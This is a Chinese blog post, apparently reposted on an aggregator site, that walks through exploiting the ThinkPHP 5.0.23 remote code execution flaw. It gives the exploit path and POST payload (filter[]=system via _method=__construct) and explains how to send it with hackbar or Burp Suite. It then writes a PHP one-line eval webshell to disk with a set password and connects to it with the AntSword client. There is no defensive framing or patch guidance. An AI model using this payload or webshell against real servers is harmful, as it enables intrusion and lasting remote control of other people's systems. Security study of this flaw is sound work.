1. Toy模板网首页
  2. > Toy博客

ThinkPHP5.0.23 远程代码执行漏洞

7月前 作者:夜星空如海 分类:Toy博客 阅读(33) 违法举报

这篇具有很好参考价值的文章主要介绍了ThinkPHP5.0.23 远程代码执行漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。
ThinkPHP5.0.23 远程代码执行漏洞,exp,安全,web安全,php
百度漏洞
ThinkPHP5.0.23 远程代码执行漏洞,exp,安全,web安全,php
获得exp
路径:

index.php?s=captcha

POST传参 我用的是hackbar,用burpsuite也行。

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=

ThinkPHP5.0.23 远程代码执行漏洞,exp,安全,web安全,php
burp操作方法
抓包 右键改为post请求
ThinkPHP5.0.23 远程代码执行漏洞,exp,安全,web安全,php
exp如下图所示填入
ThinkPHP5.0.23 远程代码执行漏洞,exp,安全,web安全,php
ThinkPHP5.0.23 远程代码执行漏洞,exp,安全,web安全,php
写入一句话

echo '<?php eval($_POST[666]); ?>' > 666.php   #密码666

上蚁剑
ThinkPHP5.0.23 远程代码执行漏洞,exp,安全,web安全,php
ThinkPHP5.0.23 远程代码执行漏洞,exp,安全,web安全,php文章来源地址https://www.toymoban.com/news/detail-516542.html

到了这里,关于ThinkPHP5.0.23 远程代码执行漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • ThinkPHP5.0.21远程命令执行漏洞

    ThinkPHP5.0.21远程命令执行漏洞

    漏洞出现的背景 : ThinkPHP是⼀款运⽤极⼴的PHP开发框架。 其5.0.23以前的版本中,获取method的⽅法中没有正确处理⽅法名, 导致攻击者可以调⽤Request类任意⽅法并构造利⽤链,从⽽导致远程代码执⾏漏洞。 由于ThinkPHP5框架对控制器名没有进⾏⾜够的安全检测,导致在没有开

    2024年02月04日
    浏览(35)
  • ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

    ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

    前言 本节我将分析thinkphp5.0.x 版本的RCE漏洞,根据漏洞的研究模拟挖掘此漏洞的思路 本次分析框架下载,由于官方已经下架了相关的下载接口,这里我们用三方下载 一份v5.0.22版本的 升级中... https://www.codejie.net/5828.html 附赠 thinkphp5.0官方开发手册 架构总览 · ThinkPHP5.0完全开

    2024年01月18日
    浏览(32)
  • Thinkphp5.x全漏洞复现分析

    Thinkphp5.x全漏洞复现分析

    我们可以把namespace理解为一个单独的空间,事实上它也就是一个空间而已,子命名空间那就是空间里再划分几个小空间,举个例子: 当有多个子命名空间有相同名称类时,不指定使用哪个命名空间的情况下取最后定义的命名空间中的类,比如上面的 dog 取的时 dogC 中的类,在

    2024年04月22日
    浏览(33)
  • ThinkPHP5.0.0~5.0.23路由控制不严谨导致的RCE

    ThinkPHP5.0.0~5.0.23路由控制不严谨导致的RCE

    本次我们继续以漏洞挖掘者的视角,来分析thinkphp的RCE 敏感函数发现 在调用入口函数:/ThinkPHP_full_v5.0.22/public/index.php 时 发现了框架底层调用了thinkphplibrarythinkApp.php的app类中的incokeMethod方法  注意传递的参数,ReflectionMethod接受的参数。如果是数组的形式, 那么参数1是这个

    2024年01月23日
    浏览(28)
  • thinkphp5.0.24反序列化漏洞分析

    thinkphp5.0.24反序列化漏洞分析

    thinkphp5框架: thinkphp5的入口文件在 publicindex.php ,访问 反序列化起点 写一个反序列化入口点 全局搜索 __destruct() 函数 thinkphp_5.0.24thinkphplibrarythinkprocesspipesWindows.php 中的 __destruct() 函数,调用了removeFiles() 跟进removeFiles(),第163行的file_exists可以触发 __toString 方法 全局搜索

    2023年04月08日
    浏览(37)
  • uniapp小程序订阅消息推送+Thinkphp5后端代码教程示例

    uniapp小程序订阅消息推送+Thinkphp5后端代码教程示例

    记录一下通过uniapp开发小程序消息推送的实例,配合后端tp推送,之前写的项目是微信小程序而且后端是原生php,这次通过项目记录一下 首先我们通过原生php代码回顾一下,不考虑模板参数的话,主要就是“ touser ”和“ ACCESS_TOKEN ” 上述代码大概就是基本流程,我们再看一

    2024年02月08日
    浏览(32)
  • 微软远程桌面服务远程代码执行漏洞

    微软远程桌面服务远程代码执行漏洞

    人和管理成为主要入侵突破口 安全需要人、技术、管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口。在 19 年处理的安全事件中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不当事件占比 3%, 与人和管理相关的事件合计占总数的 1/3,安全管理

    2024年02月13日
    浏览(22)
  • 远程代码执行漏洞的利用与防御

    远程代码执行漏洞的利用与防御

    全称:remote command/code execute 分为远程命令执行和远程代码执行 1.命令执行漏洞: 直接调用操作系统命令 2.代码执行漏洞: 靠执行脚本代码调用操作系统命令 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防

    2024年02月15日
    浏览(32)
  • RCE 远程代码执行漏洞分析

    RCE 远程代码执行漏洞分析

    Remote Command/Code Execute 远程命令执行/远程代码执行漏洞 这种漏洞通常出现在应用程序或操作系统中,攻击者可以通过利用漏洞注入恶意代码,并在受攻击的系统上执行任意命令。 PHP 代码执行 PHP 代码注入 OS 命令执行 OS 命令注入 Java、Python…… Web 应用程序 远程服务 操作系统

    2024年02月08日
    浏览(28)

  • 漏洞复现 CVE-2023-0297( pyload远程代码执行漏洞 )

    在 addcrypted2() 函数中,对传入的参数 jk 解析后用 eval_js() 作为 JS 语句执行。 利用 JS 中 pyimport 导入 OS 包,执行系统命令(文件操作,进程管理),还可以利用 os.system() 执行 shell 命令。 构建 payload 过程比较简单,只要传入所需的 package, crypted, jk, passwords 四个参数即可,这里

    2024年02月08日
    浏览(29)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包